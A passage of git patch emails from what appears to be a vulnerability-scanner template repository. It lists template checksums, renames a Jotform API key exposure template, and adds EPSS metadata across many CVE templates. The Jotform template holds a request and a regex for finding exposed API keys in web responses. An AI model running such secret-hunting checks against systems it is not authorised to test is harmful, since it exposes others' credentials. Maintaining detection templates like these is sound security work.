http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6352,6 +6352,7 @@ http/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml:9d83d3d1e9839cd45 http/vulnerabilities/joomla/joomla-department-sqli.yaml:8973142a0b5898a703c053e2960dfad1bcec33b3 http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml:9b35d1764a2220c1e4640f8ea0ffcecbe31b57d2 http/vulnerabilities/joomla/rusty-joomla.yaml:243d584db6ce05f2d2e43b09daa10eae5ff6a085 +http/vulnerabilities/jorani/jorani-benjamin-xss.yaml:20d9e87a16e54390801e1ce74e3de74f7b628bbf http/vulnerabilities/jupyter-notebook-rce.yaml:92676b19b8b57d1039df60dd120022030d31aa9a http/vulnerabilities/kkfileview-ssrf.yaml:c92bd9cba0f534f2ce8e06e6a2e12b8661a9ddab http/vulnerabilities/laravel/laravel-ignition-xss.yaml:3614ef96120a5f5e31ef5d9ab8034ad6fec63610 @@ -7027,7 +7028,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:86a76fcba5bda64812e95c90c13d343f9516826d +templates-checksum.txt:b3331acaaf83635e0a2917f1d34fac12751dc777 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 5a88bda27c31c99e9d154723a1043a1cd2b7c67f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 31 Aug 2023 11:31:16 +0530 Subject: [PATCH 0034/1090] Update and rename http/exposures/tokens/JOTFORM_API_KEY to http/exposures/tokens/jotform/jotform-api-key.yaml --- .../jotform-api-key.yaml} | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) rename http/exposures/tokens/{JOTFORM_API_KEY => jotform/jotform-api-key.yaml} (67%) diff --git a/http/exposures/tokens/JOTFORM_API_KEY b/http/exposures/tokens/jotform/jotform-api-key.yaml similarity index 67% rename from http/exposures/tokens/JOTFORM_API_KEY rename to http/exposures/tokens/jotform/jotform-api-key.yaml index fafb7dac40..6a93375d23 100644 --- a/http/exposures/tokens/JOTFORM_API_KEY +++ b/http/exposures/tokens/jotform/jotform-api-key.yaml @@ -1,17 +1,15 @@ -id: JOTFORM_API_KEY +id: jotform-api-key info: - name: JOTFORM API KEY + name: Jotform API Key author: Shankar Acharya - severity: High + severity: info reference: - https://www.jotform.com/help/253-how-to-create-a-jotform-api-key/ - - metadata: max-request: 1 verified: "true" - tags: token,exposure + tags: token,exposure,jotform http: - method: GET @@ -22,5 +20,4 @@ http: - type: regex part: body regex: - - JOTFORM_API_KEY":"[A-Za-z0-9]+" - + - "^[A-Fa-f0-9]{32}$" From 1b80dd0556ba5dcf2a69bad51ae6d4f764335217 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 31 Aug 2023 11:33:23 +0530 Subject: [PATCH 0035/1090] fix spacing --- http/exposures/tokens/jotform/jotform-api-key.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/tokens/jotform/jotform-api-key.yaml b/http/exposures/tokens/jotform/jotform-api-key.yaml index 6a93375d23..7fa8388da0 100644 --- a/http/exposures/tokens/jotform/jotform-api-key.yaml +++ b/http/exposures/tokens/jotform/jotform-api-key.yaml @@ -1,7 +1,7 @@ id: jotform-api-key info: - name: Jotform API Key + name: Jotform API Key author: Shankar Acharya severity: info reference: From d428cc0c9c9fbed2400bd2ea3bdfe90050109630 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 31 Aug 2023 17:16:18 +0530 Subject: [PATCH 0036/1090] Added EPSS Percentile --- http/cves/2000/CVE-2000-0114.yaml | 1 + http/cves/2001/CVE-2001-0537.yaml | 3 +- http/cves/2002/CVE-2002-1131.yaml | 1 + http/cves/2004/CVE-2004-0519.yaml | 1 + http/cves/2004/CVE-2004-1965.yaml | 1 + http/cves/2005/CVE-2005-2428.yaml | 1 + http/cves/2005/CVE-2005-3344.yaml | 1 + http/cves/2005/CVE-2005-3634.yaml | 1 + http/cves/2005/CVE-2005-4385.yaml | 1 + http/cves/2006/CVE-2006-1681.yaml | 1 + http/cves/2006/CVE-2006-2842.yaml | 1 + http/cves/2007/CVE-2007-0885.yaml | 3 +- http/cves/2007/CVE-2007-4504.yaml | 1 + http/cves/2007/CVE-2007-4556.yaml | 1 + http/cves/2007/CVE-2007-5728.yaml | 3 +- http/cves/2008/CVE-2008-1059.yaml | 1 + http/cves/2008/CVE-2008-1061.yaml | 1 + http/cves/2008/CVE-2008-1547.yaml | 1 + http/cves/2008/CVE-2008-2398.yaml | 1 + http/cves/2008/CVE-2008-2650.yaml | 1 + http/cves/2008/CVE-2008-4668.yaml | 1 + http/cves/2008/CVE-2008-4764.yaml | 1 + http/cves/2008/CVE-2008-5587.yaml | 1 + http/cves/2008/CVE-2008-6080.yaml | 3 +- http/cves/2008/CVE-2008-6172.yaml | 3 +- http/cves/2008/CVE-2008-6222.yaml | 3 +- http/cves/2008/CVE-2008-6465.yaml | 1 + http/cves/2008/CVE-2008-6668.yaml | 1 + http/cves/2008/CVE-2008-6982.yaml | 1 + http/cves/2008/CVE-2008-7269.yaml | 3 +- http/cves/2009/CVE-2009-0347.yaml | 3 +- http/cves/2009/CVE-2009-0545.yaml | 1 + http/cves/2009/CVE-2009-0932.yaml | 1 + http/cves/2009/CVE-2009-1151.yaml | 1 + http/cves/2009/CVE-2009-1496.yaml | 1 + http/cves/2009/CVE-2009-1558.yaml | 1 + http/cves/2009/CVE-2009-1872.yaml | 1 + http/cves/2009/CVE-2009-2015.yaml | 1 + http/cves/2009/CVE-2009-2100.yaml | 1 + http/cves/2009/CVE-2009-3053.yaml | 1 + http/cves/2009/CVE-2009-3318.yaml | 1 + http/cves/2009/CVE-2009-4202.yaml | 1 + http/cves/2009/CVE-2009-4223.yaml | 1 + http/cves/2009/CVE-2009-4679.yaml | 2 +- http/cves/2009/CVE-2009-5020.yaml | 1 + http/cves/2009/CVE-2009-5114.yaml | 1 + http/cves/2010/CVE-2010-0157.yaml | 2 +- http/cves/2010/CVE-2010-0219.yaml | 3 +- http/cves/2010/CVE-2010-0467.yaml | 1 + http/cves/2010/CVE-2010-0696.yaml | 1 + http/cves/2010/CVE-2010-0759.yaml | 1 + http/cves/2010/CVE-2010-0942.yaml | 1 + http/cves/2010/CVE-2010-0943.yaml | 1 + http/cves/2010/CVE-2010-0944.yaml | 1 + http/cves/2010/CVE-2010-0972.yaml | 1 + http/cves/2010/CVE-2010-0982.yaml | 3 +- http/cves/2010/CVE-2010-0985.yaml | 1 + http/cves/2010/CVE-2010-1056.yaml | 1 + http/cves/2010/CVE-2010-1081.yaml | 1 + http/cves/2010/CVE-2010-1217.yaml | 1 + http/cves/2010/CVE-2010-1219.yaml | 1 + http/cves/2010/CVE-2010-1302.yaml | 3 +- http/cves/2010/CVE-2010-1304.yaml | 1 + http/cves/2010/CVE-2010-1305.yaml | 1 + http/cves/2010/CVE-2010-1306.yaml | 1 + http/cves/2010/CVE-2010-1307.yaml | 1 + http/cves/2010/CVE-2010-1308.yaml | 1 + http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 2 +- http/cves/2010/CVE-2010-1314.yaml | 2 +- http/cves/2010/CVE-2010-1315.yaml | 1 + http/cves/2010/CVE-2010-1340.yaml | 1 + http/cves/2010/CVE-2010-1345.yaml | 1 + http/cves/2010/CVE-2010-1352.yaml | 1 + http/cves/2010/CVE-2010-1353.yaml | 1 + http/cves/2010/CVE-2010-1354.yaml | 1 + http/cves/2010/CVE-2010-1429.yaml | 1 + http/cves/2010/CVE-2010-1461.yaml | 2 +- http/cves/2010/CVE-2010-1469.yaml | 1 + http/cves/2010/CVE-2010-1470.yaml | 1 + http/cves/2010/CVE-2010-1471.yaml | 1 + http/cves/2010/CVE-2010-1472.yaml | 1 + http/cves/2010/CVE-2010-1473.yaml | 2 +- http/cves/2010/CVE-2010-1474.yaml | 1 + http/cves/2010/CVE-2010-1475.yaml | 1 + http/cves/2010/CVE-2010-1476.yaml | 1 + http/cves/2010/CVE-2010-1478.yaml | 3 +- http/cves/2010/CVE-2010-1491.yaml | 1 + http/cves/2010/CVE-2010-1494.yaml | 1 + http/cves/2010/CVE-2010-1495.yaml | 1 + http/cves/2010/CVE-2010-1531.yaml | 1 + http/cves/2010/CVE-2010-1532.yaml | 2 +- http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1534.yaml | 3 +- http/cves/2010/CVE-2010-1535.yaml | 2 +- http/cves/2010/CVE-2010-1540.yaml | 3 +- http/cves/2010/CVE-2010-1586.yaml | 3 +- http/cves/2010/CVE-2010-1601.yaml | 1 + http/cves/2010/CVE-2010-1602.yaml | 1 + http/cves/2010/CVE-2010-1603.yaml | 1 + http/cves/2010/CVE-2010-1607.yaml | 1 + http/cves/2010/CVE-2010-1653.yaml | 1 + http/cves/2010/CVE-2010-1657.yaml | 1 + http/cves/2010/CVE-2010-1658.yaml | 1 + http/cves/2010/CVE-2010-1659.yaml | 1 + http/cves/2010/CVE-2010-1714.yaml | 1 + http/cves/2010/CVE-2010-1715.yaml | 1 + http/cves/2010/CVE-2010-1717.yaml | 1 + http/cves/2010/CVE-2010-1718.yaml | 3 +- http/cves/2010/CVE-2010-1719.yaml | 1 + http/cves/2010/CVE-2010-1722.yaml | 1 + http/cves/2010/CVE-2010-1723.yaml | 1 + http/cves/2010/CVE-2010-1858.yaml | 1 + http/cves/2010/CVE-2010-1870.yaml | 3 +- http/cves/2010/CVE-2010-1875.yaml | 3 +- http/cves/2010/CVE-2010-1878.yaml | 1 + http/cves/2010/CVE-2010-1952.yaml | 1 + http/cves/2010/CVE-2010-1953.yaml | 1 + http/cves/2010/CVE-2010-1954.yaml | 1 + http/cves/2010/CVE-2010-1955.yaml | 1 + http/cves/2010/CVE-2010-1956.yaml | 1 + http/cves/2010/CVE-2010-1957.yaml | 1 + http/cves/2010/CVE-2010-1977.yaml | 3 +- http/cves/2010/CVE-2010-1979.yaml | 1 + http/cves/2010/CVE-2010-1980.yaml | 1 + http/cves/2010/CVE-2010-1981.yaml | 1 + http/cves/2010/CVE-2010-1982.yaml | 3 +- http/cves/2010/CVE-2010-1983.yaml | 1 + http/cves/2010/CVE-2010-2033.yaml | 3 +- http/cves/2010/CVE-2010-2034.yaml | 1 + http/cves/2010/CVE-2010-2035.yaml | 1 + http/cves/2010/CVE-2010-2036.yaml | 1 + http/cves/2010/CVE-2010-2037.yaml | 1 + http/cves/2010/CVE-2010-2045.yaml | 1 + http/cves/2010/CVE-2010-2050.yaml | 1 + http/cves/2010/CVE-2010-2122.yaml | 1 + http/cves/2010/CVE-2010-2128.yaml | 1 + http/cves/2010/CVE-2010-2259.yaml | 1 + http/cves/2010/CVE-2010-2307.yaml | 1 + http/cves/2010/CVE-2010-2507.yaml | 1 + http/cves/2010/CVE-2010-2680.yaml | 1 + http/cves/2010/CVE-2010-2682.yaml | 1 + http/cves/2010/CVE-2010-2857.yaml | 1 + http/cves/2010/CVE-2010-2861.yaml | 3 +- http/cves/2010/CVE-2010-2918.yaml | 1 + http/cves/2010/CVE-2010-2920.yaml | 1 + http/cves/2010/CVE-2010-3203.yaml | 1 + http/cves/2010/CVE-2010-3426.yaml | 1 + http/cves/2010/CVE-2010-4231.yaml | 3 +- http/cves/2010/CVE-2010-4239.yaml | 4 +- http/cves/2010/CVE-2010-4282.yaml | 1 + http/cves/2010/CVE-2010-4617.yaml | 1 + http/cves/2010/CVE-2010-4719.yaml | 1 + http/cves/2010/CVE-2010-4769.yaml | 3 +- http/cves/2010/CVE-2010-4977.yaml | 3 +- http/cves/2010/CVE-2010-5028.yaml | 3 +- http/cves/2010/CVE-2010-5278.yaml | 3 +- http/cves/2010/CVE-2010-5286.yaml | 1 + http/cves/2011/CVE-2011-0049.yaml | 1 + http/cves/2011/CVE-2011-1669.yaml | 1 + http/cves/2011/CVE-2011-2744.yaml | 3 +- http/cves/2011/CVE-2011-2780.yaml | 3 +- http/cves/2011/CVE-2011-3315.yaml | 3 +- http/cves/2011/CVE-2011-4336.yaml | 1 + http/cves/2011/CVE-2011-4618.yaml | 4 +- http/cves/2011/CVE-2011-4624.yaml | 3 +- http/cves/2011/CVE-2011-4804.yaml | 1 + http/cves/2011/CVE-2011-4926.yaml | 3 +- http/cves/2011/CVE-2011-5106.yaml | 1 + http/cves/2011/CVE-2011-5107.yaml | 1 + http/cves/2011/CVE-2011-5179.yaml | 1 + http/cves/2011/CVE-2011-5181.yaml | 1 + http/cves/2011/CVE-2011-5252.yaml | 3 +- http/cves/2011/CVE-2011-5265.yaml | 1 + http/cves/2012/CVE-2012-0392.yaml | 1 + http/cves/2012/CVE-2012-0394.yaml | 1 + http/cves/2012/CVE-2012-0896.yaml | 1 + http/cves/2012/CVE-2012-0901.yaml | 1 + http/cves/2012/CVE-2012-0981.yaml | 1 + http/cves/2012/CVE-2012-0991.yaml | 1 + http/cves/2012/CVE-2012-0996.yaml | 1 + http/cves/2012/CVE-2012-1226.yaml | 1 + http/cves/2012/CVE-2012-1823.yaml | 1 + http/cves/2012/CVE-2012-1835.yaml | 1 + http/cves/2012/CVE-2012-2371.yaml | 1 + http/cves/2012/CVE-2012-3153.yaml | 1 + http/cves/2012/CVE-2012-4032.yaml | 9 +- http/cves/2012/CVE-2012-4242.yaml | 5 +- http/cves/2012/CVE-2012-4253.yaml | 1 + http/cves/2012/CVE-2012-4273.yaml | 1 + http/cves/2012/CVE-2012-4547.yaml | 1 + http/cves/2012/CVE-2012-4768.yaml | 1 + http/cves/2012/CVE-2012-4878.yaml | 1 + http/cves/2012/CVE-2012-4889.yaml | 1 + http/cves/2012/CVE-2012-4940.yaml | 3 +- http/cves/2012/CVE-2012-4982.yaml | 1 + http/cves/2012/CVE-2012-5321.yaml | 1 + http/cves/2012/CVE-2012-5913.yaml | 3 +- http/cves/2012/CVE-2012-6499.yaml | 3 +- http/cves/2013/CVE-2013-1965.yaml | 1 + http/cves/2013/CVE-2013-2248.yaml | 3 +- http/cves/2013/CVE-2013-2251.yaml | 1 + http/cves/2013/CVE-2013-2287.yaml | 1 + http/cves/2013/CVE-2013-2621.yaml | 3 +- http/cves/2013/CVE-2013-3526.yaml | 1 + http/cves/2013/CVE-2013-3827.yaml | 3 +- http/cves/2013/CVE-2013-4117.yaml | 1 + http/cves/2013/CVE-2013-4625.yaml | 3 +- http/cves/2013/CVE-2013-5528.yaml | 1 + http/cves/2013/CVE-2013-5979.yaml | 3 +- http/cves/2013/CVE-2013-6281.yaml | 2 +- http/cves/2013/CVE-2013-7091.yaml | 1 + http/cves/2013/CVE-2013-7240.yaml | 1 + http/cves/2013/CVE-2013-7285.yaml | 1 + http/cves/2014/CVE-2014-10037.yaml | 3 +- http/cves/2014/CVE-2014-1203.yaml | 1 + http/cves/2014/CVE-2014-2321.yaml | 1 + http/cves/2014/CVE-2014-2323.yaml | 1 + http/cves/2014/CVE-2014-2383.yaml | 1 + http/cves/2014/CVE-2014-2908.yaml | 1 + http/cves/2014/CVE-2014-2962.yaml | 1 + http/cves/2014/CVE-2014-3120.yaml | 3 +- http/cves/2014/CVE-2014-3206.yaml | 3 +- http/cves/2014/CVE-2014-3704.yaml | 1 + http/cves/2014/CVE-2014-3744.yaml | 1 + http/cves/2014/CVE-2014-4210.yaml | 1 + http/cves/2014/CVE-2014-4513.yaml | 1 + http/cves/2014/CVE-2014-4535.yaml | 1 + http/cves/2014/CVE-2014-4536.yaml | 1 + http/cves/2014/CVE-2014-4539.yaml | 1 + http/cves/2014/CVE-2014-4544.yaml | 1 + http/cves/2014/CVE-2014-4550.yaml | 1 + http/cves/2014/CVE-2014-4558.yaml | 1 + http/cves/2014/CVE-2014-4561.yaml | 1 + http/cves/2014/CVE-2014-4592.yaml | 9 +- http/cves/2014/CVE-2014-4940.yaml | 1 + http/cves/2014/CVE-2014-4942.yaml | 3 +- http/cves/2014/CVE-2014-5111.yaml | 1 + http/cves/2014/CVE-2014-5258.yaml | 1 + http/cves/2014/CVE-2014-5368.yaml | 1 + http/cves/2014/CVE-2014-6271.yaml | 1 + http/cves/2014/CVE-2014-6287.yaml | 3 +- http/cves/2014/CVE-2014-6308.yaml | 1 + http/cves/2014/CVE-2014-8676.yaml | 1 + http/cves/2014/CVE-2014-8682.yaml | 1 + http/cves/2014/CVE-2014-8799.yaml | 1 + http/cves/2014/CVE-2014-9094.yaml | 1 + http/cves/2014/CVE-2014-9119.yaml | 3 +- http/cves/2014/CVE-2014-9444.yaml | 1 + http/cves/2014/CVE-2014-9606.yaml | 1 + http/cves/2014/CVE-2014-9607.yaml | 1 + http/cves/2014/CVE-2014-9608.yaml | 3 +- http/cves/2014/CVE-2014-9609.yaml | 3 +- http/cves/2014/CVE-2014-9614.yaml | 1 + http/cves/2014/CVE-2014-9615.yaml | 1 + http/cves/2014/CVE-2014-9617.yaml | 1 + http/cves/2014/CVE-2014-9618.yaml | 3 +- http/cves/2015/CVE-2015-0554.yaml | 1 + http/cves/2015/CVE-2015-1000005.yaml | 3 +- http/cves/2015/CVE-2015-1000010.yaml | 1 + http/cves/2015/CVE-2015-1000012.yaml | 1 + http/cves/2015/CVE-2015-1427.yaml | 3 +- http/cves/2015/CVE-2015-1503.yaml | 3 +- http/cves/2015/CVE-2015-1579.yaml | 1 + http/cves/2015/CVE-2015-1880.yaml | 1 + http/cves/2015/CVE-2015-2067.yaml | 1 + http/cves/2015/CVE-2015-2068.yaml | 1 + http/cves/2015/CVE-2015-2080.yaml | 1 + http/cves/2015/CVE-2015-2166.yaml | 3 +- http/cves/2015/CVE-2015-2196.yaml | 1 + http/cves/2015/CVE-2015-2755.yaml | 1 + http/cves/2015/CVE-2015-2807.yaml | 3 +- http/cves/2015/CVE-2015-2863.yaml | 1 + http/cves/2015/CVE-2015-2996.yaml | 1 + http/cves/2015/CVE-2015-3035.yaml | 1 + http/cves/2015/CVE-2015-3224.yaml | 1 + http/cves/2015/CVE-2015-3337.yaml | 1 + http/cves/2015/CVE-2015-3648.yaml | 1 + http/cves/2015/CVE-2015-3897.yaml | 3 +- http/cves/2015/CVE-2015-4050.yaml | 1 + http/cves/2015/CVE-2015-4062.yaml | 1 + http/cves/2015/CVE-2015-4063.yaml | 3 +- http/cves/2015/CVE-2015-4074.yaml | 1 + http/cves/2015/CVE-2015-4127.yaml | 1 + http/cves/2015/CVE-2015-4414.yaml | 3 +- http/cves/2015/CVE-2015-4632.yaml | 1 + http/cves/2015/CVE-2015-4666.yaml | 1 + http/cves/2015/CVE-2015-4668.yaml | 1 + http/cves/2015/CVE-2015-4694.yaml | 3 +- http/cves/2015/CVE-2015-5354.yaml | 1 + http/cves/2015/CVE-2015-5461.yaml | 1 + http/cves/2015/CVE-2015-5469.yaml | 1 + http/cves/2015/CVE-2015-5471.yaml | 3 +- http/cves/2015/CVE-2015-5531.yaml | 1 + http/cves/2015/CVE-2015-5688.yaml | 1 + http/cves/2015/CVE-2015-6477.yaml | 3 +- http/cves/2015/CVE-2015-6544.yaml | 1 + http/cves/2015/CVE-2015-6920.yaml | 1 + http/cves/2015/CVE-2015-7245.yaml | 1 + http/cves/2015/CVE-2015-7297.yaml | 1 + http/cves/2015/CVE-2015-7377.yaml | 1 + http/cves/2015/CVE-2015-7450.yaml | 3 +- http/cves/2015/CVE-2015-7780.yaml | 1 + http/cves/2015/CVE-2015-7823.yaml | 1 + http/cves/2015/CVE-2015-8349.yaml | 3 +- http/cves/2015/CVE-2015-8399.yaml | 1 + http/cves/2015/CVE-2015-8813.yaml | 1 + http/cves/2015/CVE-2015-9312.yaml | 1 + http/cves/2015/CVE-2015-9323.yaml | 13 ++- http/cves/2015/CVE-2015-9414.yaml | 1 + http/cves/2015/CVE-2015-9480.yaml | 3 +- http/cves/2016/CVE-2016-0957.yaml | 1 + http/cves/2016/CVE-2016-1000126.yaml | 1 + http/cves/2016/CVE-2016-1000127.yaml | 1 + http/cves/2016/CVE-2016-1000128.yaml | 1 + http/cves/2016/CVE-2016-1000129.yaml | 1 + http/cves/2016/CVE-2016-1000130.yaml | 1 + http/cves/2016/CVE-2016-1000131.yaml | 1 + http/cves/2016/CVE-2016-1000132.yaml | 1 + http/cves/2016/CVE-2016-1000133.yaml | 1 + http/cves/2016/CVE-2016-1000134.yaml | 1 + http/cves/2016/CVE-2016-1000135.yaml | 1 + http/cves/2016/CVE-2016-1000136.yaml | 1 + http/cves/2016/CVE-2016-1000137.yaml | 1 + http/cves/2016/CVE-2016-1000138.yaml | 1 + http/cves/2016/CVE-2016-1000139.yaml | 1 + http/cves/2016/CVE-2016-1000140.yaml | 1 + http/cves/2016/CVE-2016-1000141.yaml | 1 + http/cves/2016/CVE-2016-1000142.yaml | 1 + http/cves/2016/CVE-2016-1000143.yaml | 1 + http/cves/2016/CVE-2016-1000146.yaml | 1 + http/cves/2016/CVE-2016-1000148.yaml | 1 + http/cves/2016/CVE-2016-1000149.yaml | 1 + http/cves/2016/CVE-2016-1000152.yaml | 1 + http/cves/2016/CVE-2016-1000153.yaml | 1 + http/cves/2016/CVE-2016-1000154.yaml | 1 + http/cves/2016/CVE-2016-1000155.yaml | 1 + http/cves/2016/CVE-2016-10033.yaml | 1 + http/cves/2016/CVE-2016-10108.yaml | 6 +- http/cves/2016/CVE-2016-10134.yaml | 3 +- http/cves/2016/CVE-2016-10367.yaml | 1 + http/cves/2016/CVE-2016-10368.yaml | 1 + http/cves/2016/CVE-2016-10924.yaml | 3 +- http/cves/2016/CVE-2016-10940.yaml | 1 + http/cves/2016/CVE-2016-10956.yaml | 3 +- http/cves/2016/CVE-2016-10960.yaml | 2 +- http/cves/2016/CVE-2016-10973.yaml | 1 + http/cves/2016/CVE-2016-10993.yaml | 1 + http/cves/2016/CVE-2016-1555.yaml | 3 +- http/cves/2016/CVE-2016-2389.yaml | 1 + http/cves/2016/CVE-2016-3081.yaml | 1 + http/cves/2016/CVE-2016-3088.yaml | 1 + http/cves/2016/CVE-2016-3978.yaml | 1 + http/cves/2016/CVE-2016-4437.yaml | 3 +- http/cves/2016/CVE-2016-4975.yaml | 3 +- http/cves/2016/CVE-2016-4977.yaml | 1 + http/cves/2016/CVE-2016-5649.yaml | 3 +- http/cves/2016/CVE-2016-6195.yaml | 1 + http/cves/2016/CVE-2016-6277.yaml | 1 + http/cves/2016/CVE-2016-6601.yaml | 3 +- http/cves/2016/CVE-2016-7552.yaml | 3 +- http/cves/2016/CVE-2016-7834.yaml | 1 + http/cves/2016/CVE-2016-7981.yaml | 1 + http/cves/2016/CVE-2016-8527.yaml | 3 +- http/cves/2017/CVE-2017-0929.yaml | 1 + http/cves/2017/CVE-2017-1000028.yaml | 1 + http/cves/2017/CVE-2017-1000029.yaml | 1 + http/cves/2017/CVE-2017-1000163.yaml | 1 + http/cves/2017/CVE-2017-1000170.yaml | 1 + http/cves/2017/CVE-2017-1000486.yaml | 3 +- http/cves/2017/CVE-2017-10075.yaml | 1 + http/cves/2017/CVE-2017-10271.yaml | 3 +- http/cves/2017/CVE-2017-10974.yaml | 1 + http/cves/2017/CVE-2017-11165.yaml | 1 + http/cves/2017/CVE-2017-11444.yaml | 3 +- http/cves/2017/CVE-2017-11512.yaml | 1 + http/cves/2017/CVE-2017-11586.yaml | 1 + http/cves/2017/CVE-2017-11610.yaml | 3 +- http/cves/2017/CVE-2017-11629.yaml | 1 + http/cves/2017/CVE-2017-12138.yaml | 1 + http/cves/2017/CVE-2017-12149.yaml | 3 +- http/cves/2017/CVE-2017-12542.yaml | 3 +- http/cves/2017/CVE-2017-12544.yaml | 1 + http/cves/2017/CVE-2017-12583.yaml | 1 + http/cves/2017/CVE-2017-12611.yaml | 1 + http/cves/2017/CVE-2017-12615.yaml | 1 + http/cves/2017/CVE-2017-12617.yaml | 3 +- http/cves/2017/CVE-2017-12629.yaml | 3 +- http/cves/2017/CVE-2017-12635.yaml | 1 + http/cves/2017/CVE-2017-12637.yaml | 1 + http/cves/2017/CVE-2017-12794.yaml | 1 + http/cves/2017/CVE-2017-14135.yaml | 1 + http/cves/2017/CVE-2017-14186.yaml | 1 + http/cves/2017/CVE-2017-14524.yaml | 3 +- http/cves/2017/CVE-2017-14535.yaml | 3 +- http/cves/2017/CVE-2017-14537.yaml | 1 + http/cves/2017/CVE-2017-14622.yaml | 1 + http/cves/2017/CVE-2017-14651.yaml | 1 + http/cves/2017/CVE-2017-14849.yaml | 1 + http/cves/2017/CVE-2017-15287.yaml | 1 + http/cves/2017/CVE-2017-15363.yaml | 1 + http/cves/2017/CVE-2017-15647.yaml | 1 + http/cves/2017/CVE-2017-15715.yaml | 3 +- http/cves/2017/CVE-2017-15944.yaml | 3 +- http/cves/2017/CVE-2017-16806.yaml | 1 + http/cves/2017/CVE-2017-16877.yaml | 1 + http/cves/2017/CVE-2017-16894.yaml | 1 + http/cves/2017/CVE-2017-17043.yaml | 1 + http/cves/2017/CVE-2017-17059.yaml | 1 + http/cves/2017/CVE-2017-17451.yaml | 1 + http/cves/2017/CVE-2017-17562.yaml | 1 + http/cves/2017/CVE-2017-17731.yaml | 3 +- http/cves/2017/CVE-2017-17736.yaml | 1 + http/cves/2017/CVE-2017-18024.yaml | 1 + http/cves/2017/CVE-2017-18536.yaml | 1 + http/cves/2017/CVE-2017-18598.yaml | 1 + http/cves/2017/CVE-2017-18638.yaml | 1 + http/cves/2017/CVE-2017-3506.yaml | 1 + http/cves/2017/CVE-2017-3528.yaml | 1 + http/cves/2017/CVE-2017-4011.yaml | 1 + http/cves/2017/CVE-2017-5487.yaml | 3 +- http/cves/2017/CVE-2017-5521.yaml | 1 + http/cves/2017/CVE-2017-5631.yaml | 1 + http/cves/2017/CVE-2017-5638.yaml | 1 + http/cves/2017/CVE-2017-5689.yaml | 3 +- http/cves/2017/CVE-2017-5982.yaml | 1 + http/cves/2017/CVE-2017-6090.yaml | 3 +- http/cves/2017/CVE-2017-7269.yaml | 1 + http/cves/2017/CVE-2017-7391.yaml | 1 + http/cves/2017/CVE-2017-7615.yaml | 3 +- http/cves/2017/CVE-2017-7921.yaml | 1 + http/cves/2017/CVE-2017-7925.yaml | 4 +- http/cves/2017/CVE-2017-8229.yaml | 9 +- http/cves/2017/CVE-2017-8917.yaml | 1 + http/cves/2017/CVE-2017-9140.yaml | 1 + http/cves/2017/CVE-2017-9288.yaml | 1 + http/cves/2017/CVE-2017-9416.yaml | 3 +- http/cves/2017/CVE-2017-9506.yaml | 1 + http/cves/2017/CVE-2017-9791.yaml | 3 +- http/cves/2017/CVE-2017-9805.yaml | 3 +- http/cves/2017/CVE-2017-9822.yaml | 3 +- http/cves/2017/CVE-2017-9833.yaml | 1 + http/cves/2017/CVE-2017-9841.yaml | 1 + http/cves/2018/CVE-2018-0127.yaml | 5 +- http/cves/2018/CVE-2018-0296.yaml | 5 +- http/cves/2018/CVE-2018-1000129.yaml | 1 + http/cves/2018/CVE-2018-1000130.yaml | 3 +- http/cves/2018/CVE-2018-1000226.yaml | 1 + http/cves/2018/CVE-2018-1000533.yaml | 1 + http/cves/2018/CVE-2018-1000600.yaml | 1 + http/cves/2018/CVE-2018-1000671.yaml | 1 + http/cves/2018/CVE-2018-1000856.yaml | 1 + http/cves/2018/CVE-2018-1000861.yaml | 1 + http/cves/2018/CVE-2018-10093.yaml | 1 + http/cves/2018/CVE-2018-10095.yaml | 1 + http/cves/2018/CVE-2018-10141.yaml | 1 + http/cves/2018/CVE-2018-10201.yaml | 3 +- http/cves/2018/CVE-2018-10230.yaml | 1 + http/cves/2018/CVE-2018-10562.yaml | 3 +- http/cves/2018/CVE-2018-10822.yaml | 1 + http/cves/2018/CVE-2018-10823.yaml | 1 + http/cves/2018/CVE-2018-10956.yaml | 3 +- http/cves/2018/CVE-2018-11227.yaml | 1 + http/cves/2018/CVE-2018-11231.yaml | 1 + http/cves/2018/CVE-2018-11409.yaml | 3 +- http/cves/2018/CVE-2018-11473.yaml | 1 + http/cves/2018/CVE-2018-11709.yaml | 1 + http/cves/2018/CVE-2018-11759.yaml | 3 +- http/cves/2018/CVE-2018-11776.yaml | 3 +- http/cves/2018/CVE-2018-11784.yaml | 3 +- http/cves/2018/CVE-2018-12031.yaml | 1 + http/cves/2018/CVE-2018-12054.yaml | 3 +- http/cves/2018/CVE-2018-1207.yaml | 3 +- http/cves/2018/CVE-2018-12095.yaml | 1 + http/cves/2018/CVE-2018-12296.yaml | 3 +- http/cves/2018/CVE-2018-12300.yaml | 1 + http/cves/2018/CVE-2018-12613.yaml | 3 +- http/cves/2018/CVE-2018-12634.yaml | 3 +- http/cves/2018/CVE-2018-12675.yaml | 1 + http/cves/2018/CVE-2018-1271.yaml | 3 +- http/cves/2018/CVE-2018-1273.yaml | 3 +- http/cves/2018/CVE-2018-12909.yaml | 7 +- http/cves/2018/CVE-2018-12998.yaml | 3 +- http/cves/2018/CVE-2018-1335.yaml | 3 +- http/cves/2018/CVE-2018-13379.yaml | 3 +- http/cves/2018/CVE-2018-13380.yaml | 1 + 